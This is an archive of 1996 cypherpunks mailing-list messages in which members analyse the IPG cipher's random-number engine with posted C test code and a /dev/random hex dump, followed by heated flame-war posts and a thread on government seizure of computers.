> 		/* count limits the number of traverses to 53^2 so we don't get stuck */
> 		for(count = 0; count < 2809; count++) {

2809 is a too small limit. For example, if ALL B == 1, A == 16385, and 
C == 20361, the loop may need (20361-16385) passes to get to the < 16384
value.

Again, if all A = 16385, all B = 0, all C = 16386, the loop will never 
end with a correct A (your code reflects that).

> 			jv++;
> 			if (jv == 53) jv = 0;
> 			A[jv] = (A[jv] + B[jv]) % C[jv];
> 			if (A[jv] < 16384) break;
> 		}
> 		if (count == 2809) fprintf(stderr,"Oops.\n");
> 		else {
> 			if (!diehard) {
> 				printf("%d\n",A[jv]);
> 			}
> 			else {
> 				/* print output in DIEHARD required format:
> 				** actually since we have 16-bit ints and DIEHARD
> 				** wants 32-bit ints, we print 20 per line instead of 10 */
> 				if (nelem++ > 19) {printf("\n"); nelem = 0;}
> 				printf("%4.4x",(unsigned int)A[jv]);
> 			}
> 		}
> 	}
> }
> 
> 

You are also bringing a good point that Chi-squared tests are not
sufficient to make any conclusions about usefulness of this particular
pseudo random number generator.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 30 Nov 1996 14:16:03 -0800 (PST)
To: ericm@lne.com (Eric Murray)
Subject: Re: IPG algorithim
In-Reply-To: <199611302118.NAA12825@slack.lne.com>
Message-ID: <199611302150.PAA15126@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


[This is an addition to my previous reply to Eric]

It bugs me that you are using rand() (a fairly lame pseudo-random
function that was never intended to be used in cryptographic
applications) to seed A, B, C and JV and then test the A(JV) for
randomness. Some may object to that. Just for fun, I am attaching a hex
dump of output from my /dev/random (Linux 2.0.24). You could simply take
these truly random values and put them in initial A, B, C and JV, just
to be sure.

I doubt though that your results (poor randomness of A(JV)) will be
any different.

igor

0000000 c76d 74ac b253 ffc3 ae97 e092 629c 7a53
0000010 087a 21e6 8c2c 0ab6 a03a ea3c 0c71 a748
0000020 68f0 540d a4f2 0a2b b62b 4ab6 ddaa d3e4
0000030 a795 51f3 7dff 067d 2f6b 8d18 fa23 0200
0000040 99df 1d97 e232 b8d5 381f cf1e 7ea8 d971
0000050 8aa0 df0b cf41 53e2 a9f5 5304 dc28 c242
0000060 c01b 5990 75a1 688d 497f cc54 d336 217e
0000070 7dd7 4800 09d4 ff5b 53b8 6308 d38f 60f5
0000080 513a 3ea7 90f6 4cdf e783 6a14 145a e2b1
0000090 2041 6bb5 f417 6109 6101 fecd b7f1 7287
00000a0 f31a 6cb4 d559 ed7c 1be8 e0ca 21f9 8779
00000b0 701e bbcc 8909 7743 bfef c5ef 0f60 cd6a
00000c0 565b 30b5 e710 5f66 aa83 0751 5bc7 867e
00000d0 87a8 8511 9969 d101 c1bb 871b a2e5 f579
00000e0 5e14 9167 480a 9fc2 8354 5769 4ee0 7765
00000f0 faf5 c29f 25ad 77ea 9ecf 39b4 2d11 969f
0000100 099c f85a 7240 9922 0513 d607 41ea ba29
0000110 1886 2611 e577 50c6 87af 393a 782a 6666
0000120 9ae0 221e ec58 ce2e de77 b6de 5821 82e9
0000130 db17 5027 7e57 567a 2e82 f056 01d0 2cde
0000140 0314 ac33 78bd d569 215e b8d7 6a3b 0caa
0000150 b44f 8c6c 04de 4cf2 e111 2803 a073 7d27
0000160 f78c 9d28 70ca 1cd4 ce53 5dea 3141 efa9
0000170 8246 c7ee 4ed3 e49a 8d97 8ded d818 327a
0000180 f999 e044 ff28 ffe9 0254 535c 7e70 a09c
0000190 af58 bcd2 07b0 8146 f4cc 7568 751c c6ee
00001a0 b6b7 be3f d870 84ce 7f8c 3ec4 1427 09fc
00001b0 706e 93f8 9752 230b 74cd 0b0b 38be ba5b
00001c0 a9a6 062a cdee f11d d367 37e2 ec4f 90e4
00001d0 9019 d9ff 2ff9 fb5d 559b 4dd0 2ab0 7e35
00001e0 184a 3e90 f072 7349 007f 5d41 c176 8d8a
00001f0 a30c 1a68 eca6 63f4 256f 88e1 2cec dc1a
0000200 a0ac 90f0 b515 2fbc 2778 4e66 2323 7528
0000210 59c3 c3a9 3ccd e29d 315a fa6a 7821 f6e4
0000220 7977 5e9f df6c f87e 5d15 5693 3da8 9790
0000230 faaf d028 0c05 f5f0 160a 8cb7 f726 18cf
0000240 796d 77c5 3c2e 5ddb f770 7183 3c17 81b7
0000250 b0ff ad01 a4d3 26a1 7821 d210 376a 8283
0000260 3860 61a9 c509 e34c 46a4 7f70 b2ff 18db
0000270 24ad 97b5 e474 eee2 9036 c125 3fdb 88ce
0000280 824a 3096 98fc 0b9f 2f3a 6ac3 25e1 8d08
0000290 46c6 7218 ea87 3c6d 6395 6fc5 34b0 1447
00002a0 ddb3 b3af fdbf b545 5f47 0fe6 bfd0 e799
00002b0 99f6 1fc6 c70b 524f 717f a25d 9f08 f78a
00002c0 e230 b4b9 2045 5652 9677 5ce3 a827 9e8f
00002d0 261f 4650 c731 afbb e257 8410 621a 09aa
00002e0 d991 7a3b bb68 4995 fd15 2afc 8e26 842b
00002f0 cdf7 2d13 4055 9d22 be44 aa16 ed06 db8a
0000300 4210 714b 330d 6c9e 3f81 c993 4d8b 2f6b
0000310 134f 1566 8170 9cc6 4cff d188 78c4 29ae
0000320 27ec 731f 391c 6241 ffaf 2967 8756 1517
0000330 5d1a e807 c477 7757 bd6a ff4c 1cf1 01ce
0000340 dfa7 25b4 5a4f 9cf0 e96e 2d69 0de0 c24e
0000350 0a2c 9ec8 112d 0851 c028 917b b00b f9a0
0000360 0b07 b9f0 c4ef 4426 1cce c8c8 7186 8c24
0000370 9868 fe68 9136 1316 1e58 e883 5aa9 1298
0000380 c0ed eaa4 aaa2 7f23 48d1 5056 8837 06ec
0000390 5f69 ce3a 3d5b 1e7a 7545 e237 352d d887
00003a0 df9c 734d a441 7fa5 6685 eff0 4ce8 1876
00003b0 f9c9 2e18 f825 3a3a a6b8 e0cc 5d49 136a
00003c0 853d dd88 c0f8 befc 8b87 e261 fd73 09af
00003d0 b392 3afa f38e 6a25 cc5d b624 1012 49f3
00003e0 31b0 196c aa02 b3f2 454a 7817 2198 5ad7
00003f0 84c5 f22d 8b6e cdc9 12c3 d0b5 b866 9976
0000400 97a7 3b5e dedf 201d 50f5 99a6 bf54 04ab
0000410 a34e 3a66 538c 51a0 c00b 7ae8 f2ae 6343
0000420 c5f1 1ef1 1f8f 7415 5b50 53a4 33ad d046
0000430 13b6 62a2 cc34 feee 7fda 671a 2b28 a36c
0000440 a806 15be 1ccc b5b9 ef85 04ca 168c 8cd0
0000450 c44e d117 a6c8 cbaf 3b5b 581c d94a 8469
0000460 effb 0f18 cd45 5c77 6ab1 1289 e385 9771
0000470 199f 5610 8095 be8b e257 2ef8 a221 99ee
0000480 1d8b c81c 9781 e803 e4ab 4afb 5669 efb1
0000490 b31f 36e2 5930 b838 e84c 4f6e a709 0c40
00004a0 fefe c530 4ee2 ee3a aa2e e278 de99 8b1e
00004b0 4e83 c98a 47cd 4715 081d 7c7d 5f6f 657c
00004c0 49b5 70c0 937a d4c2 39ff d282 8768 1d7c
00004d0 40fe 1ed1 59b9 d0f7 b4cc 55b3 5da2 4118
00004e0 14dc 4b71 202a fb96 0bed 6d2a 03d6 2f2d
00004f0 9056 8d84 8b6e 948b 4b89 efd1 53ba 9a13
0000500 ea01 770a dc40 fcad bf69 cf60 7884 3f66
0000510 b057 2e82 3745 2839 f68d f637 ad95 5463
0000520 ff3c 353d 08b2 44c2 72bb b25b f60d 0dbf
0000530 455a e9b4 8bbf 3307 071a f720 f00e 0217
0000540 f8cc f7cc 2cc4 ef14 e6b6 7dbc ceff 2dea
0000550 fc34 ed72 d59b 8cd2 794c 2d11 e470 ba44
0000560 bff3 c531 b38b 5398 4a46 63be d86b ae19
0000570 d6a4 2e8d da0d 0ff9 a3db 2cc4 0494 72b1
0000580 b871 1f7e b8da a2f0 2f63 b522 3212 43da
0000590 f910 374e b1f5 5462 8db0 65ef 5e5b 9bf1
00005a0 9337 5003 31fc 47a9 8c06 d0d8 c8ab 8732
00005b0 ff5e 7fe3 b43c 9ba0 14dd f31f cf4c a5b5
00005c0 5552 b1ee 0ee6 a38f dc2b 32ac ab80 e12d
00005d0 be8c ad7d 89e9 5cda 0781 f30c b1d1 3163
00005e0 72f9 bcbe 5972 1862 3a15 660f 4227 b168
00005f0 280d 35fa 1765 46f3 468b 0538 44fc 216e
0000600 30f6 8340 6805 7f5c a280 fcdf 563d 9751
0000610 50c9 fb04 065c 12ec 9ce3 34ee 2a3d f821
0000620 d43e b64e 067f fd26 5e94 b7d1 9b28 fbcf
0000630 811b 4631 6018 5385 1297 e37a b0ea c6fd

Eric Murray wrote:
> 
> 
> 
> I have translated the IPG algorithim's "engine" to C, to generate
> some random values from it for testing purposes.  It does not
> look very random in either the xnoisesph program or the DIEHARD
> test battery.   However I may well have misinterprested Mr. Wood's
> description (his writing is, as Mr. Chudov points out, difficult to
> understand) or written my code incorrectly.  Here it is, play
> with it yourself.  To my untrained eye the lack of randomness
> in what's essentially a stream cipher would be disturbing.
> However I am not a cryptoanalysist so I do not know to
> what extent this weakens the cipher.
> 
> 
> The IPG description does not say (but implies to me) that
> the various tables that are to be filled in by "random" values must
> be filled in by PRNGs that are seeded with the same seeds by
> each of the party that knows the key.  Otherwise the "encryptor
> streams" that are generated will be unrelated and decryption will not
> be possible.  To make my test work I have used the simple rand()
> function to fill in the tables.
> 
> 
> Corrections are welcome.
> 
> 
> 
> #include <stdio.h>
> 
> /* a C translation of the IPG "EUREKA" algorithim's "engine".
> ** This is supposed to produce random numbers for the IPG
> ** "encryptor stream".
> ** See http://www.netprivacy.com/ for the original description.
> ** Eric Murray  ericm@lne.com  This code placed under GNU copyleft.  */
> 
> /* machine-dependent stuff, change to suit different platforms: */
> typedef unsigned char byte;
> typedef unsigned short uint16;
> 
> 
> /* tables: */
> uint16 A[53];
> uint16 B[53];
> uint16 C[53];
> 
> 
> int init_table(uint16*table, uint16 min, uint16 max)
> {
> 	/* IPG specifies no algorithim for producing the "random"
> 	** initial values in the ABC tables, but it's obvious that
> 	** it requires a PRNG that's somehow seeded from the "key".
> 	** I've just used rand() here.  In UNIX rand() called with no
> 	** seed is supposed to seed itself with 0. */
> 	int i;
> 	int count, r;
> 
> 	for(i = 0; i < 53; i++) {
> 		table[i] = min + (rand() % (max - min));
> 	}
> }
> 
> main(int argc, char **argv)
> {
> 	uint16 jv;
> 	int argcnt, i, n, count, diehard, nelem;
> 
> 	diehard = 0;
> 	argcnt = 1;
> 	if (argc >= 2) {
> 		if (strncmp(argv[argcnt],"-d") == 0) {
> 			diehard++;
> 			argcnt++;
> 		}
> 	}
> 	if (argc > argcnt - 1 ) {
> 		n = atoi(argv[argcnt]);
> 		fprintf(stderr,"Generating %d values\n",n);
> 	}
> 	else {
> 		n = 2000;
> 	}
> 
> 	/* seed tables: */
> 	fprintf(stderr,"Seeding:  A");  fflush(stderr);
> 	init_table(A,0,65535);
> 	fprintf(stderr," B");  fflush(stderr);
> 	init_table(B,0,12227);
> 	fprintf(stderr," C");  fflush(stderr);
> 	init_table(C,16384,20361);
> 	fprintf(stderr,"\n");  fflush(stderr);
> 
> 	/* generate n values: */
> 	for(; n > 0; n--) {
> 		/* jv is "random" (where's it seeded from?) */
> 		jv = (uint16)(rand() % 53);
> 
> 		/* count limits the number of traverses to 53^2 so we don't get stuck */
> 		for(count = 0; count < 2809; count++) {
> 			jv++;
> 			if (jv == 53) jv = 0;
> 			A[jv] = (A[jv] + B[jv]) % C[jv];
> 			if (A[jv] < 16384) break;
> 		}
> 		if (count == 2809) fprintf(stderr,"Oops.\n");
> 		else {
> 			if (!diehard) {
> 				printf("%d\n",A[jv]);
> 			}
> 			else {
> 				/* print output in DIEHARD required format:
> 				** actually since we have 16-bit ints and DIEHARD
> 				** wants 32-bit ints, we print 20 per line instead of 10 */
> 				if (nelem++ > 19) {printf("\n"); nelem = 0;}
> 				printf("%4.4x",(unsigned int)A[jv]);
> 			}
> 		}
> 	}
> }
> 
> 
> 
> -- 
> Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
> PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 30 Nov 1996 16:22:28 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: IPG algorithim
In-Reply-To: <199611302150.PAA15126@manifold.algebra.com>
Message-ID: <199612010021.QAA14426@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov @ home writes:
> 
> [This is an addition to my previous reply to Eric]
> 
> It bugs me that you are using rand() (a fairly lame pseudo-random
> function that was never intended to be used in cryptographic
> applications) to seed A, B, C and JV and then test the A(JV) for
> randomness. Some may object to that.

Yea, you're right, rand() is lame.

I added /dev/random to my Linux box and changed my small test to use it.
I also changed the way that I use JV- I had been setting it to a random
value for each trip through the "engine", but since I beleive that
its value can't really be random (if you want to be able to have someone
decrypt your stuff :-) but must be exchanged in the key, I set it
to a random value once and then let it float.  It's also a lot faster
that way, /dev/random is pretty slow (because it's looking for real
random material).

My results from xnoisesph were wrong- xnoisesph wants random bytes
instead of random integers in ascii format as I was producing.
Changing it (as I have below) makes the xnoisesph output look
much better, but it still isn't all that random.  The random seed generators
I have written that get their randomness from repeated calls
to high-resolution timers and hashes of system log files do better.
I also fixed a minor bug in arg processing.






#include <stdio.h>
#include <fcntl.h>

/* a C translation of the IPG "EUREKA" algorithim's "engine".
** This is supposed to produce random numbers for the IPG
** "encryptor stream".
** See http://www.netprivacy.com/ for the original description.
** Eric Murray  ericm@lne.com  This code placed under GNU copyleft. 
** V0.2 */

typedef unsigned char byte;
typedef unsigned short uint16;


/* tables: */
uint16 A[53];
uint16 B[53];
uint16 C[53];


#ifndef NO_DEV_RANDOM
uint16 getrand()
{
	uint16 ret;
	int fd = open("/dev/random",O_RDONLY);
	if (fd <= 0) {
		perror("/dev/random"); exit(-1);
	}
	read(fd,(unsigned char *)(&ret),sizeof(ret));
	close(fd);
	return(ret);
}
#else
/* do something appropriate for your OS here, rand() is lame. */
#define getrand rand
#endif


int init_table(uint16*table, uint16 min, uint16 max)
{
	/* IPG specifies no algorithim for producing the "random"
	** initial values in the ABC tables, but it's obvious that
	** it requires a PRNG that's somehow seeded from the "key".
	** I've used /dev/random here, so there's no question that
	** I'm starting out with pretty good random values. */
	int i;
	int count, r;

	for(i = 0; i < 53; i++) {
		table[i] = min + (getrand() % (max - min));
	}
}

main(int argc, char **argv)
{
	uint16 jv;
	int argcnt, i, n, count, diehard, nelem;

	diehard = 0;
	argcnt = 1;
	if (argc >= 2) {
		if (strncmp(argv[argcnt],"-d",2) == 0) {
			diehard++;
			argcnt++;
		}
	}
	if (argc > argcnt - 1 ) {
		n = atoi(argv[argcnt]);
		fprintf(stderr,"Generating %d values\n",n);
	}
	else {
		n = 2000;
	}

	/* seed tables: */
	fprintf(stderr,"Seeding:  A");  fflush(stderr);
	init_table(A,0,65535);
	fprintf(stderr," B");  fflush(stderr);
	init_table(B,0,12227);
	fprintf(stderr," C");  fflush(stderr);
	init_table(C,16384,20361);
	fprintf(stderr,"\n");  fflush(stderr);

	/* generate n values: */
	/* jv is "random" (where's it seeded from?) */
	jv = (uint16)(getrand() % 53);
	for(; n > 0; n--) {

		/* count limits the number of traverses to 53^2 so we don't get stuck */
		/* 2809 is actually too low per Chudov:
		** "For example, if ALL B == 1, A == 16385, and C == 20361, the
		**  loop may need (20361-16385) passes to get to the < 16384 value."
		*/
		for(count = 0; count < 2809; count++) {
			jv++;
			if (jv == 53) jv = 0;
			A[jv] = (A[jv] + B[jv]) % C[jv];
			if (A[jv] < 16384) break;
		}
		if (count == 2809) fprintf(stderr,"Oops.\n");
		else {
			if (!diehard) {
				write(1,(unsigned char *)&A[jv],sizeof(uint16));
			}
			else {
				/* print output in DIEHARD required format:
				** actually since we have 16-bit ints and DIEHARD
				** wants 32-bit ints, we print 20 per line instead of 10 */
				if (nelem++ > 19) {printf("\n"); nelem = 0;}
				printf("%4.4x",(unsigned int)A[jv]);
			}
		}
	}
}
-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 30 Nov 1996 16:34:16 -0800 (PST)
To: ericm@lne.com (Eric Murray)
Subject: Re: IPG algorithim
In-Reply-To: <199612010021.QAA14426@slack.lne.com>
Message-ID: <199612010026.SAA15878@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Eric Murray wrote:
> Igor Chudov @ home writes:
> > [This is an addition to my previous reply to Eric]
> > It bugs me that you are using rand() (a fairly lame pseudo-random
> > function that was never intended to be used in cryptographic
> > applications) to seed A, B, C and JV and then test the A(JV) for
> > randomness. Some may object to that.
> 
> Yea, you're right, rand() is lame.
> 
> I added /dev/random to my Linux box and changed my small test to use it.
> I also changed the way that I use JV- I had been setting it to a random
> value for each trip through the "engine", but since I beleive that
> its value can't really be random (if you want to be able to have someone
> decrypt your stuff :-) but must be exchanged in the key, I set it
> to a random value once and then let it float.  It's also a lot faster
> that way, /dev/random is pretty slow (because it's looking for real
> random material).

Oh yes! Surely, jv should be set to a random value during the
setup. Thereafter it should simply be incremented modulo 53.

> My results from xnoisesph were wrong- xnoisesph wants random bytes
> instead of random integers in ascii format as I was producing.
> Changing it (as I have below) makes the xnoisesph output look
> much better, but it still isn't all that random.  The random seed generators

Can you publish the results? And what does xnoisesph do exactly?

> I have written that get their randomness from repeated calls
> to high-resolution timers and hashes of system log files do better.
> I also fixed a minor bug in arg processing.






> #include <stdio.h>
> #include <fcntl.h>
> 
> /* a C translation of the IPG "EUREKA" algorithim's "engine".
> ** This is supposed to produce random numbers for the IPG
> ** "encryptor stream".
> ** See http://www.netprivacy.com/ for the original description.
> ** Eric Murray  ericm@lne.com  This code placed under GNU copyleft. 
> ** V0.2 */
> 
> typedef unsigned char byte;
> typedef unsigned short uint16;
> 
> 
> /* tables: */
> uint16 A[53];
> uint16 B[53];
> uint16 C[53];
> 
> 
> #ifndef NO_DEV_RANDOM
> uint16 getrand()
> {
> 	uint16 ret;
> 	int fd = open("/dev/random",O_RDONLY);
> 	if (fd <= 0) {
> 		perror("/dev/random"); exit(-1);
> 	}
> 	read(fd,(unsigned char *)(&ret),sizeof(ret));
> 	close(fd);
> 	return(ret);
> }
> #else
> /* do something appropriate for your OS here, rand() is lame. */
> #define getrand rand
> #endif
> 
> 
> int init_table(uint16*table, uint16 min, uint16 max)
> {
> 	/* IPG specifies no algorithim for producing the "random"
> 	** initial values in the ABC tables, but it's obvious that
> 	** it requires a PRNG that's somehow seeded from the "key".
> 	** I've used /dev/random here, so there's no question that
> 	** I'm starting out with pretty good random values. */
> 	int i;
> 	int count, r;
> 
> 	for(i = 0; i < 53; i++) {
> 		table[i] = min + (getrand() % (max - min));
> 	}
> }
> 
> main(int argc, char **argv)
> {
> 	uint16 jv;
> 	int argcnt, i, n, count, diehard, nelem;
> 
> 	diehard = 0;
> 	argcnt = 1;
> 	if (argc >= 2) {
> 		if (strncmp(argv[argcnt],"-d",2) == 0) {
> 			diehard++;
> 			argcnt++;
> 		}
> 	}
> 	if (argc > argcnt - 1 ) {
> 		n = atoi(argv[argcnt]);
> 		fprintf(stderr,"Generating %d values\n",n);
> 	}
> 	else {
> 		n = 2000;
> 	}
> 
> 	/* seed tables: */
> 	fprintf(stderr,"Seeding:  A");  fflush(stderr);
> 	init_table(A,0,65535);
> 	fprintf(stderr," B");  fflush(stderr);
> 	init_table(B,0,12227);
> 	fprintf(stderr," C");  fflush(stderr);
> 	init_table(C,16384,20361);
> 	fprintf(stderr,"\n");  fflush(stderr);
> 
> 	/* generate n values: */
> 	/* jv is "random" (where's it seeded from?) */
> 	jv = (uint16)(getrand() % 53);
> 	for(; n > 0; n--) {
> 
> 		/* count limits the number of traverses to 53^2 so we don't get stuck */
> 		/* 2809 is actually too low per Chudov:
> 		** "For example, if ALL B == 1, A == 16385, and C == 20361, the
> 		**  loop may need (20361-16385) passes to get to the < 16384 value."
> 		*/
> 		for(count = 0; count < 2809; count++) {
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

replace 2809 with (20361-16385) * 53 + 1000


> 			jv++;
> 			if (jv == 53) jv = 0;
> 			A[jv] = (A[jv] + B[jv]) % C[jv];
> 			if (A[jv] < 16384) break;
> 		}
> 		if (count == 2809) fprintf(stderr,"Oops.\n");
                            ^^^^^^

and here

> 		else {
> 			if (!diehard) {
> 				write(1,(unsigned char *)&A[jv],sizeof(uint16));
> 			}
> 			else {
> 				/* print output in DIEHARD required format:
> 				** actually since we have 16-bit ints and DIEHARD
> 				** wants 32-bit ints, we print 20 per line instead of 10 */
> 				if (nelem++ > 19) {printf("\n"); nelem = 0;}
> 				printf("%4.4x",(unsigned int)A[jv]);
> 			}
> 		}
> 	}
> }
> -- 
> Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
> PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 30 Nov 1996 18:47:45 -0800 (PST)
To: Eric Murray <ericm@lne.com>
Subject: Re: IPG algorithim
In-Reply-To: <199611302118.NAA12825@slack.lne.com>
Message-ID: <32A0EE99.1023@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray wrote:
> I have translated the IPG algorithim's "engine" to C, to generate

[snippo]

Now that's what I call amazing.  Maybe I could rewrite PGP
tomorrow (hee hee).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Reece <reece@taz.nceye.net>
Date: Sat, 30 Nov 1996 11:19:16 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.BSI.3.95.961130023512.19278G-100000@citrine.cyberstation.net>
Message-ID: <19961130191901.17546.qmail@taz.nceye.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: wichita@cyberstation.net
   Date: Sat, 30 Nov 1996 02:41:28 -0600 (CST)
   cc: Bill Frantz <frantz@netcom.com>,
	   John Anonymous MacDonald <nobody@cypherpunks.ca>, cypherpunks@toad.com
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

   Shannon proved that you cannot prove what the plaintext
   is for OTPs,


Let P, K, and C represent bit strings of equal length.  Given a
ciphertext C, for every plaintext P there exists a key K such that

  P XOR K = C.

This is true (K=P XOR C).


   or for the system we have developed either.

False.

Let P and C represent byte strings of equal (arbitrary) length and K
represent the key string of fixed length.

The IPG algorithm can be summarized

  C = P XOR PRNG(K)

where PRNG(K) is the output of the pseudo-random number generator with
seed K.  The details of the PRNG are unimportant for this argument.

For every ciphertext C longer than K, there exists a plaintext P such that
no K will satisfy

  C = P XOR PRNG(K).

Proof: There are 256^length(K) possible keys (roughly 10^34322).
There are therefore at most this many possible decryotions of the
given plaintext.  Since length(C) > length(K), there are more possible
plaintexts than possible decryptions.

Shannon's proof of the security of the OTP therefore doesn't
apply to IPG's cipher.

Assume that the PRNG is resistant to analysis. Given the size of the
keyspace, it is not feasible to search the whole keyspace hoping
something like a plaintext pops out.  However, it is easy to take a
key obtained through some other means and verify that the plaintext
makes sense.  Since the PRNG is assumed resistant to analysis, this
constitutes proof that the plaintext is correct (since it's infeasible
to find a key that decrypts the ciphertext to another plausible
plaintext).

Of course, all encryption algorithms short of the OTP allow an
attacker to prove a key correct, but most cryptographers don't claim
their algorithms to be as secure as OTPs.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Sat, 30 Nov 1996 15:09:08 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: IPG Algorith Broken!
Message-ID: <849391118.629483.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Some of these bullies, like Paul Bradley, realize that they don't know
> the meanings of the words they use. Paul Bradley not only posts nonsense
> about brute force attacks on OTP, but also harrasses anyone who exposes
> his utter ignorance, in en effort to intimidate them into shutting up.

You don`t seem to realise that not only is my reputation unnafected 
by your worthless drivel about "brute force attacks on one time 
pads", which everyone else apart from you and Don immediately 
accepted as a simple misunderstanding of the topic of the message (I 
was talking about stream ciphers), but I am finding it rather amusing 
to watch the level of your rants deteriorate to the point where you 
now label anyone who actually posts about cryptography on this list 
as a "k00l hAcKiNg D00d" who knows nothing of what he is talking 
about. And as for harrasing people to shut up if you had been 
watching the traffic on the list you would have noticed that I 
disagreed with John over throwing you off the list. I simply wonder 
if the reason you appear to be so calm offline but a foaming at the 
mouth lunatic online is that you are scared someone is going to give 
you the good kicking you so rightly deserve.

> "Cypherpunks'" opinion of any proposed new cryptosystem is worthless and
> irrelevant.

And I suppose the opinion of a man who cannot control his urges to 
post rants about "sovok jews" and armenian refugees is of great value 
to the learned and worthy???

 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Boursy <boursy@earthlink.net>
Date: Sat, 30 Nov 1996 18:01:45 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: The Rise and Fall of Cypherpunks  WAS [Re: the Dennings]
In-Reply-To: <Pine.LNX.3.95.961130145407.24591C-100000@dhp.com>
Message-ID: <32A0E79B.417E@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


aga wrote:
> 
>>
>> Ridicule is what John Gilmore and EFF deserve, and more.

  That's to good for them--complete contempt is more called 
for.

 
> Well, if it does not apply to Boursy, then you are still going
> to get a royal ass-kicking. The EFF and Gilmore are too connected
> to UUNET and the cabal to have any credibility on this usenet any
> m.

  
  The EFF is a corporate whore with no interest whatsoever in the
rights of individual users--they will side with the business owners
every time.  And not to forget they signed off on the Exon Ammendment
much to the contempt of the ACLU.

                         Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucifer@dhp.com (Anonymous)Tired.Fighter@dhp.com
Date: Sat, 30 Nov 1996 18:25:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: denial of service and government rights
Message-ID: <199612010225.VAA05194@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain



This thread is probably already due for a change in
the Subject line, but I'll leave it untouched for 
the moment.

On 30 Nov 96 at 13:10, Black Unicorn wrote:

> On Fri, 29 Nov 1996, Greg Broiles wrote:

> [...]
> 
> > I don't see any reason why this wouldn't be true for a
> > computer. Fed.Rul.Crim.Pro. 41(b)(1) allows the seizure 
> > (but seizure is not forfeiture) of "property that 
> > constitutes evidence of the commission of a
> > criminal offense". 
> 
> It is true of computers.
> Take the case of Ripco (the Chicago BBS raided in the 
> SunDevil raids back when).
> 
> I don't think "Dr. Ripco" has yet gotten his equipment 
> back.  I don't know for sure, but what I do know is 
> that 5 years after the raid, he still had certainly 
> not gotten anything back.
[....] 
> Recall also that Ripco was never specifically charged 
> (or the minor charges that they did try to pin didn't 
> stick).
> 
> Also recall that Ripco (now ripco.com) was raided with a
> -sealed- warrant. I dont think that the contents of that 
> warrant have, even today, been released (though I could 
> be mistaken).  Certainly 5 years after they had not.

[....]
> > But there's a big difference between "seizure" and 
> > "forfeiture".
> 
> I'd argue with computer hardware it is a distinction 
> without a difference. Seizing computer hardware (like 
> Ripco's stuff) for in excess of 5 years is tantamount
> to forfeiture given depreciation and so forth.
> 
> Add to this the very liberal rules about how long the 
> feds can take to even CHARGE you with a crime after 
> seizure....

And it sums to a very bleak picture, indeed.

[....]
> > So yes, there may be a statute which gives title to
> > the government in computers used to commit crimes, 
> > and no, the Supreme Court won't necessarily care 
> > about an "innocent owner".
> 
> Again, I would argue that such a statute needn't even 
> exist given the rules already well estlablished and 
> demonstrated in action with regard to indefinate 
> seizure of computer hardware even in the absence of 
> criminal claims against the owner.

Please forgive my naivete, but are there no legal
weapons available to the 'victims' in such cases?
I'm passingly familiar with the Operation Sundevil
fiasco -- i.e., with the outcome re the principal
'charges'.  I'm appalled, however, at the apparent 
lack of remedies for return of such seized property.
Are individuals who find themselves in such a 
predicament simply at the government's mercy (there's
an oxymoron for ya)??


Tired Fighter





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 30 Nov 1996 21:52:17 -0800 (PST)
To: Tired.Fighter@dhp.com
Subject: Re: denial of service and government rights
In-Reply-To: <199612010225.VAA05194@dhp.com>
Message-ID: <32A11CFB.421@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Tired.Fighter@dhp.com wrote:
> On 30 Nov 96 at 13:10, Black Unicorn wrote:
> > On Fri, 29 Nov 1996, Greg Broiles wrote:
> > > I don't see any reason why this wouldn't be true for a
> > > computer. Fed.Rul.Crim.Pro. 41(b)(1) allows the seizure
> > > (but seizure is not forfeiture) of "property that
> > > constitutes evidence of the commission of a
> > > criminal offense".

[snip]

> Please forgive my naivete, but are there no legal
